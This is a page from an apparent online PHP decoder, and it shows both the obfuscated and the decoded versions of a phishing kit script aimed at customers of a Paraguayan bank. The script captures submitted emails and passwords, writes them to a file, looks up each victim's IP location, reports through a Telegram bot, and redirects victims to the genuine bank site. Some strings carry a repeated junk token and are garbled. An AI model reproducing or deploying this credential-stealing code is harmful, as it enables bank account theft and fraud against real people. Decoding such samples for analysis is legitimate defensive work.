Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto lYNtf; zEjJg: header("\114\x6f\143\x61\x74\151\157\156\72\40\150\164\164\x70\..
Decoded Output download
<?php
goto lYNtf; zEjJg: header("Location: https://bancaweb.solar.com.py/SolarWeb/"); goto n0VQO; A85yD: $server_output = curl_exec($ch); goto YI7p5; HUIDW: $ipInfo = get_ip_info($ip); goto ghZga; sz18I: function get_ip_info($ip) { $url = "http://ip-api.com/json/{$ip}"; $response = file_get_contents($url); if ($response) { $data = json_decode($response, true); if ($data["status"] == "success") { $country = $data["country"]; $city = $data["city"]; return "Pa\303\255s: {$country}
Ciudad:"EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQicaci\xc3\xb3n no disponible."; } goto JjJdV; MmWdp: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto A85yD; GJEYL: @(include "tlgram.php"); goto uokNo; sPBcr: $id = $chatID; goto E0G1w; qmZ6Q: $fecha = date("d-m-Y"); goto Dex0B; IhVMq: curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id={$id}&parse_mode=HTML&text={$msg}"); goto MmWdp; JjJdV: $userp = $_SERVER["REMOTE_ADDR"]; goto t5pCW; uokNo: @(include "wrn.php"); goto AqFho; AqFho: @(include "not.php"); goto rD97k; ghZga: $msg = "**\360\237\xa7\x99\xf0\x9f\x8f\xbc\342\x80\x8d\342\x99\x82\357\270\217SOLAR\360\x9f\xa7\x99\xf0\x9f\x8f\274\342\x80\x8d\xe2\231\x82\xef\xb8\217**
" . "\360\x9f\x9f\242C0RR30:"EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQx49P:"EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQ142icaci\303\263n: {$ipInfo}"; goto KZ5NB; E0G1w: $urlMsg = "https://api.telegram.org/bot{$token}/sendMessage"; goto G5iHX; Dex0B: $ip = $_SERVER["REMOTE_ADDR"]; goto GJEYL; KZ5NB: $ch = curl_init(); goto bv_Qx; rD97k: function get_client_ip() { $ipaddress = ''; if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ipaddress = $_SERVER["HTTP_CLIENT_IP"]; } else { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ipaddress = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_X_FORWARDED"])) { $ipaddress = $_SERVER["HTTP_X_FORWARDED"]; } else { if (isset($_SERVER["HTTP_FORWARDED_FOR"])) { $ipaddress = $_SERVER["HTTP_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_FORWARDED"])) { $ipaddress = $_SERVER["HTTP_FORWARDED"]; } else { if (isset($_SERVER["REMOTE_ADDR"])) { $ipaddress = $_SERVER["REMOTE_ADDR"]; } else { $ipaddress = "UNKNOWN"; } } } } } } return $ipaddress; } goto sz18I; p0Qsv: curl_setopt($ch, CURLOPT_POST, 1); goto IhVMq; t5pCW: $token = $T0K3N; goto sPBcr; bv_Qx: curl_setopt($ch, CURLOPT_URL, $urlMsg); goto p0Qsv; lYNtf: if ($_POST) { $js4 = $_POST["js4"]; $js5 = $_POST["js5"]; fwrite(fopen("data.txt", "a"), "C0RR30: " . "{$js4}\xa" . "PASSWR-@: " . "{$js5}\xa"); } goto qmZ6Q; G5iHX: $ip = get_client_ip(); goto HUIDW; YI7p5: curl_close($ch); goto zEjJg; n0VQO: ?>Did this file decode correctly?
Original Code
<?php
goto lYNtf; zEjJg: header("\114\x6f\143\x61\x74\151\157\156\72\40\150\164\164\x70\x73\72\57\57\142\x61\x6e\x63\x61\x77\x65\x62\56\x73\157\x6c\x61\162\56\x63\157\x6d\56\x70\171\x2f\x53\157\x6c\x61\162\x57\x65\x62\57"); goto n0VQO; A85yD: $server_output = curl_exec($ch); goto YI7p5; HUIDW: $ipInfo = get_ip_info($ip); goto ghZga; sz18I: function get_ip_info($ip) { $url = "\x68\x74\x74\x70\x3a\x2f\57\151\160\55\141\160\x69\x2e\x63\157\x6d\57\152\x73\157\x6e\57{$ip}"; $response = file_get_contents($url); if ($response) { $data = json_decode($response, true); if ($data["\163\x74\141\164\x75\x73"] == "\x73\165\143\x63\x65\163\x73") { $country = $data["\143\157\165\156\164\x72\x79"]; $city = $data["\x63\151\x74\171"]; return "\120\x61\303\255\x73\x3a\x20{$country}\12\x43\x69\x75\x64\x61\144\72\42EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQ\x69\143\x61\143\151\xc3\xb3\156\40\156\x6f\x20\x64\x69\x73\x70\157\156\151\x62\x6c\145\56"; } goto JjJdV; MmWdp: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto A85yD; GJEYL: @(include "\164\154\x67\162\141\155\x2e\x70\150\160"); goto uokNo; sPBcr: $id = $chatID; goto E0G1w; qmZ6Q: $fecha = date("\x64\55\x6d\x2d\x59"); goto Dex0B; IhVMq: curl_setopt($ch, CURLOPT_POSTFIELDS, "\143\x68\141\164\x5f\151\x64\75{$id}\x26\160\x61\x72\x73\x65\x5f\155\157\x64\145\x3d\110\124\115\114\x26\x74\145\170\x74\75{$msg}"); goto MmWdp; JjJdV: $userp = $_SERVER["\x52\x45\x4d\117\124\x45\x5f\101\104\x44\122"]; goto t5pCW; uokNo: @(include "\x77\162\x6e\x2e\x70\150\160"); goto AqFho; AqFho: @(include "\x6e\157\164\56\160\150\x70"); goto rD97k; ghZga: $msg = "\52\52\360\237\xa7\x99\xf0\x9f\x8f\xbc\342\x80\x8d\342\x99\x82\357\270\217\123\x4f\114\101\122\360\x9f\xa7\x99\xf0\x9f\x8f\274\342\x80\x8d\xe2\231\x82\xef\xb8\217\x2a\x2a\12" . "\360\x9f\x9f\242\x43\60\x52\122\x33\x30\x3a\42EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQx49\x50\x3a\42EYHgEzWEdjJgYKAu8VjC4DohVYUMbvZ6Ua45MgSaYBTFv3725expKB69YsjM6Utj99E6Sn3LpcxQ4mNrwfrJLM5NGbWiQ142\x69\143\141\143\x69\303\263\x6e\x3a\40{$ipInfo}"; goto KZ5NB; E0G1w: $urlMsg = "\x68\164\164\x70\x73\72\57\57\x61\160\x69\56\x74\x65\154\x65\147\162\141\x6d\56\x6f\x72\147\57\142\x6f\x74{$token}\57\x73\x65\156\144\x4d\145\163\163\x61\x67\145"; goto G5iHX; Dex0B: $ip = $_SERVER["\122\105\x4d\x4f\x54\x45\137\101\104\104\122"]; goto GJEYL; KZ5NB: $ch = curl_init(); goto bv_Qx; rD97k: function get_client_ip() { $ipaddress = ''; if (isset($_SERVER["\x48\124\x54\120\137\x43\x4c\x49\x45\x4e\124\137\x49\120"])) { $ipaddress = $_SERVER["\x48\x54\x54\120\137\x43\114\111\105\x4e\x54\137\111\120"]; } else { if (isset($_SERVER["\x48\124\124\x50\137\x58\137\106\117\x52\x57\101\x52\x44\105\104\137\x46\117\122"])) { $ipaddress = $_SERVER["\x48\x54\x54\120\137\x58\137\106\x4f\x52\127\x41\122\x44\105\104\x5f\x46\x4f\x52"]; } else { if (isset($_SERVER["\x48\124\x54\120\137\x58\x5f\106\x4f\122\x57\x41\122\x44\x45\104"])) { $ipaddress = $_SERVER["\x48\124\x54\120\137\130\x5f\106\117\122\127\101\122\104\x45\x44"]; } else { if (isset($_SERVER["\110\124\x54\120\x5f\106\x4f\x52\x57\101\x52\104\x45\x44\x5f\106\x4f\122"])) { $ipaddress = $_SERVER["\110\124\124\x50\137\106\x4f\x52\127\101\x52\x44\x45\104\x5f\106\x4f\122"]; } else { if (isset($_SERVER["\x48\x54\124\120\x5f\106\117\x52\x57\101\122\x44\x45\104"])) { $ipaddress = $_SERVER["\x48\x54\124\120\x5f\x46\117\x52\x57\101\122\x44\105\104"]; } else { if (isset($_SERVER["\122\x45\x4d\117\x54\105\137\x41\x44\104\122"])) { $ipaddress = $_SERVER["\122\105\115\117\x54\105\137\x41\104\x44\x52"]; } else { $ipaddress = "\125\x4e\113\x4e\x4f\127\116"; } } } } } } return $ipaddress; } goto sz18I; p0Qsv: curl_setopt($ch, CURLOPT_POST, 1); goto IhVMq; t5pCW: $token = $T0K3N; goto sPBcr; bv_Qx: curl_setopt($ch, CURLOPT_URL, $urlMsg); goto p0Qsv; lYNtf: if ($_POST) { $js4 = $_POST["\152\x73\64"]; $js5 = $_POST["\x6a\x73\x35"]; fwrite(fopen("\x64\141\x74\141\x2e\x74\x78\x74", "\x61"), "\103\x30\122\122\x33\x30\72\x20" . "{$js4}\xa" . "\x50\101\x53\123\127\x52\x2d\x40\x3a\x20" . "{$js5}\xa"); } goto qmZ6Q; G5iHX: $ip = get_client_ip(); goto HUIDW; YI7p5: curl_close($ch); goto zEjJg; n0VQO: ?>Function Calls
| None |
Stats
| MD5 | cef6cfa634713fb919427735343ffe22 |
| Eval Count | 0 |
| Decode Time | 50 ms |